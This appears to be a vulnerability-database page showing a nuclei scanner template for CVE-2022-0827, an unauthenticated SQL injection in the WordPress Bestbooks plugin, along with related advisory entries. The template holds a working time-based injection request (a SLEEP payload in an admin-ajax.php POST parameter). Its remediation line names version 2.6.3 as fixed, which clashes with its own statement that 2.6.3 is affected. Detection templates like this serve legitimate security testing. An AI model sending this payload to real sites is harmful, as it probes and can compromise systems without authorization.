Lucene search
K

WordPress Best Books <=2.6.3 - SQL Injection

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

WordPress Best Books <=2.6.3 - SQL Injection vulnerability. Unsanitized parameters via AJAX action could lead to unauthorized access and data leakage

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-0827
13 Jun 202213:15
attackerkb
Circl
CVE-2022-0827
26 Jan 202500:00
circl
CNNVD
WordPress plugin Bestbooks SQL注入漏洞
13 Jun 202200:00
cnnvd
CNVD
WordPress Bestbooks plugin SQL注入漏洞
15 Jun 202200:00
cnvd
CVE
CVE-2022-0827
13 Jun 202212:41
cve
Cvelist
CVE-2022-0827 Bestbooks <= 2.6.3 - Unauthenticated SQLi
13 Jun 202212:41
cvelist
NVD
CVE-2022-0827
13 Jun 202213:15
nvd
OSV
CVE-2022-0827
13 Jun 202213:15
osv
Patchstack
WordPress Bestbooks plugin <= 2.6.3 - Unauthenticated SQL Injection (SQLi) vulnerability
17 May 202200:00
patchstack
Prion
Sql injection
13 Jun 202213:15
prion
Rows per page
id: CVE-2022-0827

info:
  name: WordPress Best Books <=2.6.3 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    WordPress Best Books plugin through 2.6.3 is susceptible to SQL injection. The plugin does not sanitize and escape some parameters before using them in a SQL statement via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    An attacker can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  remediation: |
    Update to WordPress Best Books plugin version 2.6.3 or later to fix the SQL injection vulnerability.
  reference:
    - https://wpscan.com/vulnerability/0d208ebc-7805-457b-aa5f-ffd5adb2f3be
    - https://wordpress.org/plugins/bestbooks/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0827
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0827
    cwe-id: CWE-89
    epss-score: 0.09047
    epss-percentile: 0.9464
    cpe: cpe:2.3:a:presspage:bestbooks:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: presspage
    product: bestbooks
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,bestbooks,unauthenticated,presspage,vkev,vuln

http:
  - raw:
      - |
        @timeout 10s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=bestbooks_add_transaction&type=x&account=x&date=x&description=1&debit=(CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)&credit=1

    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=6'
          - 'status_code == 200'
          - 'contains(body, "Account added successfully")'
        condition: and
# digest: 4b0a0048304602210081c54838c0d8697047dfe6cb0619751e443dba160f23e5306489ab610db00aed022100aeb837e9ca66639890fc61daa73810d4688495344f11b337b63d61d2145692bd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
EPSS0.09047
25